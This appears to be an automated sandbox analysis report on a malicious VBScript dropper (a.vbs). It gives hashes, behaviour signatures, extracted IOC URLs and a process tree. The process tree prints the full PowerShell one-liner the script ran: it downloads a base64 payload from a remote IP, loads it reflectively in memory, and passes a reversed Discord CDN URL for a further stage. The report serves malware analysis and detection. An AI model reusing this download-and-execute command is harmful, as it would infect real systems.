Analysis

  • max time kernel
    323s
  • max time network
    336s
  • platform
    windows7_x64
  • resource
    win7-20221111-es
  • resource tags

    arch:x64arch:x86image:win7-20221111-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    05-12-2022 17:37

General

  • Target

    a.vbs

  • Size

    226KB

  • MD5

    9792c84f24e1492cc4d179523fdfcb9d

  • SHA1

    f53e9afdd5ba3302186b6be1ac446c9f081c362f

  • SHA256

    03b0e67b65740307c5f7109587ff3218aa803c0998a23f83f8790fd9a1e0fb47

  • SHA512

    83c42a63b51dfa007012ef6f0b8e2c5e8df31610d2af391f62e7921ce5bc5bdc7eff31f255d8ab96a58563ecb20f0051f61e9482b97ce97ee60e0cfbd0d1518e

  • SSDEEP

    3072:eXFJliLfuE8ozlADw8auustFmbicHkwOt4MYI2x75nehsqgB3F23st+Zn3F/MvVF:sliLfudcHV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://4.204.233.44/Dll/Dll.ppam

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $roWg = [system.Convert]::FromBase64string((New-object Net.WebClient).DownloadString('http://4.204.233.44/Dll/Dll.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.2008edod2/9278076503521797401/6154437779443457401/stnemhcatta/moc.ppadrocsid.ndc//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1488

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/888-54-0x000007FEFBB61000-0x000007FEFBB63000-memory.dmp
    Filesize

    8KB

  • memory/1488-55-0x0000000000000000-mapping.dmp
  • memory/1488-57-0x000007FEF33E0000-0x000007FEF3E03000-memory.dmp
    Filesize

    10.1MB

  • memory/1488-59-0x00000000023B4000-0x00000000023B7000-memory.dmp
    Filesize

    12KB

  • memory/1488-58-0x000007FEF2880000-0x000007FEF33DD000-memory.dmp
    Filesize

    11.4MB

  • memory/1488-60-0x000000001B780000-0x000000001BA7F000-memory.dmp
    Filesize

    3.0MB

  • memory/1488-61-0x00000000023BB000-0x00000000023DA000-memory.dmp
    Filesize

    124KB

  • memory/1488-62-0x00000000023B4000-0x00000000023B7000-memory.dmp
    Filesize

    12KB

  • memory/1488-63-0x00000000023BB000-0x00000000023DA000-memory.dmp
    Filesize

    124KB